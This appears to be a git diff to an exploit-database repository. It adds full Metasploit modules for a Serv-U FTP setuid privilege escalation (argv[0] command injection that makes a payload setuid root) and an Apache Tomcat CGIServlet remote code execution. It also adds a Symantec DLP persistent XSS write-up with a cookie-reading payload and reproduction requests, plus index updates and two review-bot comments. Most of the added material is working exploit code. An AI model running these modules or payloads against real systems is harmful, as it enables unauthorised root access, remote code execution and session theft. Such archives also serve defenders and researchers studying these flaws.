diff --git a/exploits/linux/local/47072.rb b/exploits/linux/local/47072.rb
new file mode 100755
index 000000000..a26288eb9
--- /dev/null
+++ b/exploits/linux/local/47072.rb
@@ -0,0 +1,172 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Post::Linux::Kernel
+ include Msf::Post::Linux::Priv
+ include Msf::Post::Linux::System
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Serv-U FTP Server prepareinstallation Privilege Escalation',
+ 'Description' => %q{
+ This module attempts to gain root privileges on systems running
+ Serv-U FTP Server versions prior to 15.1.7.
+
+ The `Serv-U` executable is setuid `root`, and uses `ARGV[0]`
+ in a call to `system()`, without validation, when invoked with
+ the `-prepareinstallation` flag, resulting in command execution
+ with root privileges.
+
+ This module has been tested successfully on Serv-U FTP Server
+ version 15.1.6 (x64) on Debian 9.6 (x64).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Guy Levin', # @va_start - Discovery and exploit
+ 'bcoles' # Metasploit
+ ],
+ 'DisclosureDate' => '2019-06-05',
+ 'References' =>
+ [
+ ['CVE', '2019-12181'],
+ ['EDB', '47009'],
+ ['PACKETSTORM', '153333'],
+ ['URL', 'https://github.com/guywhataguy/CVE-2019-12181'],
+ ['URL', 'https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181'],
+ ['URL', 'https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html'],
+ ['URL', 'https://documentation.solarwinds.com/en/success_center/servu/Content/Release_Notes/Servu_15-1-7_release_notes.htm'],
+ ['URL', 'https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-Potential-elevation-of-privileges-on-Linux-systems']
+ ],
+ 'Platform' => ['linux'],
+ 'Arch' =>
+ [
+ ARCH_X86,
+ ARCH_X64,
+ ARCH_ARMLE,
+ ARCH_AARCH64,
+ ARCH_PPC,
+ ARCH_MIPSLE,
+ ARCH_MIPSBE
+ ],
+ 'SessionTypes' => ['shell', 'meterpreter'],
+ 'Targets' => [['Auto', {}]],
+ 'DefaultOptions' =>
+ {
+ 'PrependSetresuid' => true,
+ 'PrependSetresgid' => true,
+ 'PrependFork' => true,
+ 'WfsDelay' => 30
+ },
+ 'DefaultTarget' => 0))
+ register_options [
+ OptString.new('SERVU_PATH', [true, 'Path to Serv-U executable', '/usr/local/Serv-U/Serv-U'])
+ ]
+ register_advanced_options [
+ OptBool.new('ForceExploit', [false, 'Override check result', false]),
+ OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+ ]
+ end
+
+ def servu_path
+ datastore['SERVU_PATH']
+ end
+
+ def base_dir
+ datastore['WritableDir'].to_s
+ end
+
+ def upload(path, data)
+ print_status "Writing '#{path}' (#{data.size} bytes) ..."
+ rm_f path
+ write_file path, data
+ register_file_for_cleanup path
+ end
+
+ def upload_and_chmodx(path, data)
+ upload path, data
+ chmod path
+ end
+
+ def check
+ unless command_exists? 'bash'
+ vprint_error 'bash shell is not available'
+ return CheckCode::Safe
+ end
+ vprint_good 'bash shell is available'
+
+ unless cmd_exec("test -x '#{servu_path}' && echo true").include? 'true'
+ vprint_error "#{servu_path} is not executable"
+ return CheckCode::Safe
+ end
+ vprint_good "#{servu_path} is executable"
+
+ unless setuid? servu_path
+ vprint_error "#{servu_path} is not setuid"
+ return CheckCode::Safe
+ end
+ vprint_good "#{servu_path} is setuid"
+
+ CheckCode::Detected
+ end
+
+ def exploit
+ unless check == CheckCode::Detected
+ unless datastore['ForceExploit']
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+ end
+ print_warning 'Target does not appear to be vulnerable'
+ end
+
+ if is_root?
+ unless datastore['ForceExploit']
+ fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+ end
+ end
+
+ unless writable? base_dir
+ fail_with Failure::BadConfig, "#{base_dir} is not writable"
+ end
+
+ if nosuid? base_dir
+ fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
+ end
+
+ payload_name = ".#{rand_text_alphanumeric 10..15}"
+ @payload_path = "#{base_dir}/#{payload_name}"
+ upload_and_chmodx @payload_path, generate_payload_exe
+
+ argv0 = %Q{\\";chown root #{@payload_path};chmod u+s #{@payload_path};chmod +x #{@payload_path}\\"}
+ cmd = %Q{bash -c 'exec -a "#{argv0}" #{servu_path} -prepareinstallation'}
+ vprint_status "Executing command: #{cmd}"
+ cmd_exec cmd
+
+ unless setuid? @payload_path
+ fail_with Failure::Unknown, 'Failed to set payload setuid root'
+ end
+ print_good "#{@payload_path} setuid root successfully"
+
+ print_status 'Executing payload...'
+ res = cmd_exec "#{@payload_path} &"
+ vprint_line res
+ end
+
+ def on_new_session(session)
+ if session.type.eql? 'meterpreter'
+ session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+ session.fs.file.rm @payload_path
+ else
+ session.shell_command_token "rm -f '#{@payload_path}'"
+ end
+ ensure
+ super
+ end
+end
\ No newline at end of file
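Review bot: After the `cmd_exec cmd` step in `exploit`, a root-owned setuid copy of the payload sits under `WritableDir` with a dot-prefixed random name, and the only explicit removal in this file is in `on_new_session`, so a run that never gets a session leaves that file on the host. `upload` also calls `register_file_for_cleanup`, but whether the framework's cleanup can delete a root-owned file from the original unprivileged session is not visible here. The metadata should declare the side effect the way the Tomcat module in this same commit does, with `'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK ] },`. I would also add a comment above `print_status 'Executing payload...'`: `# If no session opens, @payload_path stays setuid root and has to be removed by hand.`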
diff --git a/exploits/linux/webapps/47059.txt b/exploits/linux/webapps/47059.txt
index 2f5c0bf58..d5d532897 100644
--- a/exploits/linux/webapps/47059.txt
+++ b/exploits/linux/webapps/47059.txt
@@ -3,7 +3,6 @@
# Date: 6/29/2019
# Exploit Author: Joey Lane
# Vendor Homepage: https://www.cyberpowersystems.com
-# Software Link: https://dl4jz3rbrsfum.cloudfront.net/software/ppbe340-linux-x86_64.sh
# Version: 3.4.0
# Tested on: Ubuntu 16.04
# CVE : Pending
diff --git a/exploits/multiple/webapps/47071.txt b/exploits/multiple/webapps/47071.txt
new file mode 100644
index 000000000..8981f58f8
--- /dev/null
+++ b/exploits/multiple/webapps/47071.txt
@@ -0,0 +1,81 @@
+# Exploit Title: Persistent XSS on Symantec DLP <= 15.5 MP1
+# Date: 2019-06-21
+# Exploit Author: Chapman Schleiss
+# Vendor Homepage: https://www.symantec.com/
+# Software Link: https://support.symantec.com/us/en/mysymantec.html
+# Version: <= 15.5 MP1
+# CVE : 2019-9701
+# Advisory-URL: https://support.symantec.com/us/en/article.SYMSA1484.html
+# Hot Fix: https://support.symantec.com/us/en/article.ALERT2664.html
+
+Description
+---------------
+Persistent XSS via 'name' param at
+/ProtectManager/enforce/admin/senderrecipientpatterns/list
+
+
+Payload: ' oNmouseover=prompt(document.domain,document.cookie) )
+Browser: Firefox 64, IE 11
+Date Observed: 15 January 2019
+
+
+Reproduction POST
+-----------------
+POST
+/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/update
+HTTP/1.1
+Host: [snip].com:8443
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)
+Gecko/20100101 Firefox/64.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://
+[snip].com:8443/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/edit?id=41&version=30
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 558
+Connection: close
+
+name=%27+oNmouseover%3Dprompt%28document.domain%2Cdocument.cookie%29+%29&description=some_text&userPatterns=test%
+40test.com&ipAddresses=192.168.1.1&urlDomains=mail.company.com
+&id=41&version=30
+
+Reproduction GET
+----------------
+GET /ProtectManager/enforce/admin/senderrecipientpatterns/list HTTP/1.1
+Host: [snip].com:8443
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)
+Gecko/20100101 Firefox/64.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://
+[snip].com:8443/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/edit?id=41&version=30
+Connection: close
+
+Reproduction Response
+---------------------
+
\ No newline at end of file
diff --git a/exploits/windows/remote/47073.rb b/exploits/windows/remote/47073.rb
new file mode 100755
index 000000000..38879d7c9
--- /dev/null
+++ b/exploits/windows/remote/47073.rb
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability',
+ 'Description' => %q{
+ This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the
+ enableCmdLineArguments setting is set to true, a remote user can abuse this to execute
+ system commands, and gain remote code execution.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Yakov Shafranovich', # Original discovery
+ 'sinn3r' # Metasploit module
+ ],
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Targets' =>
+ [
+ [ 'Apache Tomcat 9.0 or prior for Windows', { } ]
+ ],
+ 'References' =>
+ [
+ ['CVE', '2019-0232'],
+ ['URL', 'https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/'],
+ ['URL', 'https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/']
+ ],
+ 'Notes' =>
+ {
+ 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],
+ 'Reliability' => [ REPEATABLE_SESSION ],
+ 'Stability' => [ CRASH_SAFE ]
+ },
+ 'CmdStagerFlavor' => 'vbs',
+ 'DefaultOptions' =>
+ {
+ 'RPORT' => 8080
+ },
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Apr 10 2019', # Date of public advisory issued by the vendor
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The URI path to CGI script', '/'])
+ ])
+
+ register_advanced_options(
+ [
+ OptBool.new('ForceExploit', [false, 'Override check result', false])
+ ])
+
+ deregister_options('SRVHOST', 'SRVPORT', 'URIPATH')
+ end
+
+ def check
+ sig = Rex::Text.rand_text_alpha(10)
+ uri = normalize_uri(target_uri.path)
+ uri << "?&echo+#{sig}"
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => uri
+ })
+
+ unless res
+ vprint_error('No Response from server')
+ return CheckCode::Unknown
+ end
+
+ if res.body.include?(sig)
+ return CheckCode::Vulnerable
+ end
+
+ CheckCode::Safe
+ end
+
+ def execute_command(cmd, opts={})
+ # Our command stager assumes we have access to environment variables.
+ # We don't necessarily have that, so we have to modify cscript to a full path.
+ cmd.gsub!('cscript', 'C:\\Windows\\System32\\cscript.exe')
+
+ uri = normalize_uri(target_uri.path)
+ uri << "?{CGI.escape(cmd)}"
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => uri
+ })
+
+ unless res
+ fail_with(Failure::Unreachable, 'No response from server')
+ end
+
+ unless res.code == 200
+ fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
+ end
+ end
+
+ # it seems we don't really have a way to retrieve the filenames from the VBS command stager,
+ # so we need to rely on the user to cleanup the files.
+ def on_new_session(cli)
+ print_warning('Make sure to manually cleanup the exe generated by the exploit')
+ super
+ end
+
+ def exploit
+ print_status("Checking if #{rhost} is vulnerable")
+ unless check == CheckCode::Vulnerable
+ unless datastore['ForceExploit']
+ fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+ end
+
+ print_warning('Target does not appear to be vulnerable.')
+ end
+
+ print_status("#{rhost} seems vulnerable, what a good day.")
+ execute_cmdstager(flavor: :vbs, temp: '.', linemax: 7000)
+ end
+end
\ No newline at end of file
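Review bot: `check` returns `CheckCode::Vulnerable` whenever `res.body.include?(sig)` is true, but `sig` is also part of the request URI built a few lines earlier, so any response that reflects the query string (an error page, for instance) matches without a command having run. The response status is not examined either. Used as an audit signal this over-reports, so the limit should be documented above the comparison, e.g. `# A page that merely reflects the query string also matches; treat this result as unconfirmed.` A weaker result code for a bare substring match would be more accurate, but `exploit` compares against `CheckCode::Vulnerable`, so both places would have to change together.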
diff --git a/files_exploits.csv b/files_exploits.csv
index 11b13f218..bde51eef6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10564,6 +10564,7 @@ id,file,description,date,author,type,platform,port
47012,exploits/windows/local/47012.py,"Tuneclone 2.20 - Local SEH Buffer Overflow",2019-06-20,Achilles,local,windows,
47017,exploits/linux/local/47017.rb,"Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)",2019-06-20,Metasploit,local,linux,
47070,exploits/macos/local/47070.rb,"Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)",2019-07-02,Metasploit,local,macos,
+47072,exploits/linux/local/47072.rb,"Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)",2019-07-03,Metasploit,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17518,6 +17519,7 @@ id,file,description,date,author,type,platform,port
47039,exploits/linux/remote/47039.rb,"Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)",2019-06-26,Metasploit,remote,linux,
47047,exploits/linux/remote/47047.rb,"Linux Mint 18.3-19.1 - 'yelp' Command Injection (Metasploit)",2019-07-01,b1ack0wl,remote,linux,
47067,exploits/hardware/remote/47067.py,"FaceSentry Access Control System 6.4.8 - Remote SSH Root",2019-07-01,LiquidWorm,remote,hardware,
+47073,exploits/windows/remote/47073.rb,"Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)",2019-07-03,Metasploit,remote,windows,8080
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41437,14 +41439,14 @@ id,file,description,date,author,type,platform,port
47022,exploits/php/webapps/47022.txt,"SeedDMS versions < 5.1.11 - Remote Command Execution",2019-06-24,"Nimit Jain",webapps,php,
47027,exploits/multiple/webapps/47027.py,"GrandNode 4.40 - Path Traversal / Arbitrary File Download",2019-06-24,"Corey Robinson",webapps,multiple,
47033,exploits/hardware/webapps/47033.html,"Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution",2019-06-25,XORcat,webapps,hardware,
-47034,exploits/php/webapps/47034.txt,"AZADMIN CMS 1.0 - SQL Injection",2019-06-25,"felipe andrian",webapps,php,
+47034,exploits/php/webapps/47034.txt,"AZADMIN CMS 1.0 - SQL Injection",2019-06-25,"felipe andrian",webapps,php,80
47035,exploits/aspx/webapps/47035.py,"BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal",2019-06-25,"Aaron Bishop",webapps,aspx,
-47036,exploits/php/webapps/47036.txt,"WordPress Plugin iLive 1.0.4 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,
-47037,exploits/php/webapps/47037.txt,"WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,
+47036,exploits/php/webapps/47036.txt,"WordPress Plugin iLive 1.0.4 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,80
+47037,exploits/php/webapps/47037.txt,"WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,80
47044,exploits/php/webapps/47044.py,"LibreNMS 1.46 - 'addhost' Remote Code Execution",2019-06-28,Askar,webapps,php,80
-47045,exploits/php/webapps/47045.txt,"WorkSuite PRM 2.4 - 'password' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,
-47046,exploits/php/webapps/47046.txt,"CiuisCRM 1.6 - 'eventType' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,
-47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,
+47045,exploits/php/webapps/47045.txt,"WorkSuite PRM 2.4 - 'password' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80
+47046,exploits/php/webapps/47046.txt,"CiuisCRM 1.6 - 'eventType' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80
+47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,80
47059,exploits/linux/webapps/47059.txt,"PowerPanel Business Edition - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,linux,
47060,exploits/php/webapps/47060.txt,"ZoneMinder 1.32.3 - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,php,
47061,exploits/multiple/webapps/47061.txt,"SAP Crystal Reports - Information Disclosure",2019-07-01,"Mohamed M.Fouad",webapps,multiple,
@@ -41454,3 +41456,4 @@ id,file,description,date,author,type,platform,port
47065,exploits/hardware/webapps/47065.txt,"FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery",2019-07-01,LiquidWorm,webapps,hardware,
47066,exploits/hardware/webapps/47066.py,"FaceSentry Access Control System 6.4.8 - Remote Root Exploit",2019-07-01,LiquidWorm,webapps,hardware,
47069,exploits/php/webapps/47069.py,"Centreon 19.04 - Remote Code Execution",2019-07-02,Askar,webapps,php,
+47071,exploits/multiple/webapps/47071.txt,"Symantec DLP 15.5 MP1 - Cross-Site Scripting",2019-07-03,"Chapman Schleiss",webapps,multiple,8443
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index e1208f284..f13582632 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -986,4 +986,4 @@ id,file,description,date,author,type,platform
47055,shellcodes/arm/47055.c,"Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
47056,shellcodes/arm/47056.c,"Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
-47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,kiriknik,shellcode,linux_x86
+47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/47068.c b/shellcodes/linux_x86/47068.c
index 7d577ab0f..3de6c346d 100644
--- a/shellcodes/linux_x86/47068.c
+++ b/shellcodes/linux_x86/47068.c
@@ -2,7 +2,7 @@
;Category: Shellcode
;Title: GNU/Linux x86 - execve /bin/sh using JMP-CALL-POP technique (21
bytes)
-;Author: kiriknik
+;Author: Kirill Nikolaev
;Date: 01/07/2019
;Architecture: Linux x86